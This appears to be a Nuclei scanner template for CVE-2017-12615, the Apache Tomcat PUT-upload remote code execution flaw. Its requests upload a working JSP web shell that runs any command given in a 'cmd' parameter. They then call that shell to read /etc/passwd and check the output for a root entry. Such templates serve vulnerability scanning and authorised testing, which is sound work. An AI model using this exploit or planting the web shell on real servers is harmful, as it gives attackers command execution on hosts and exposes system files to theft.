id: CVE-2017-12615

info:
  name: Apache Tomcat RCE
  author: pikpikcu
  severity: critical
  tags: cve,cve2017,apache,rce
  reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
  description: |
    By design, you are not allowed to upload JSP files via the PUT method on Apache Tomcat servers. This is a security measure intended to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that have enabled PUT by sending a specially crafted PUT request to the server.

requests:
  - method: PUT
    path:
      - "{{BaseURL}}/poc.jsp/"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      <%@ page import="java.util.*,java.io.*"%>
      <%
      if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
          out.println(disr);
          disr = dis.readLine();
        }
      }
      %>

  - method: GET
    path:
      - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
        part: body
      - type: status
        status:
          - 200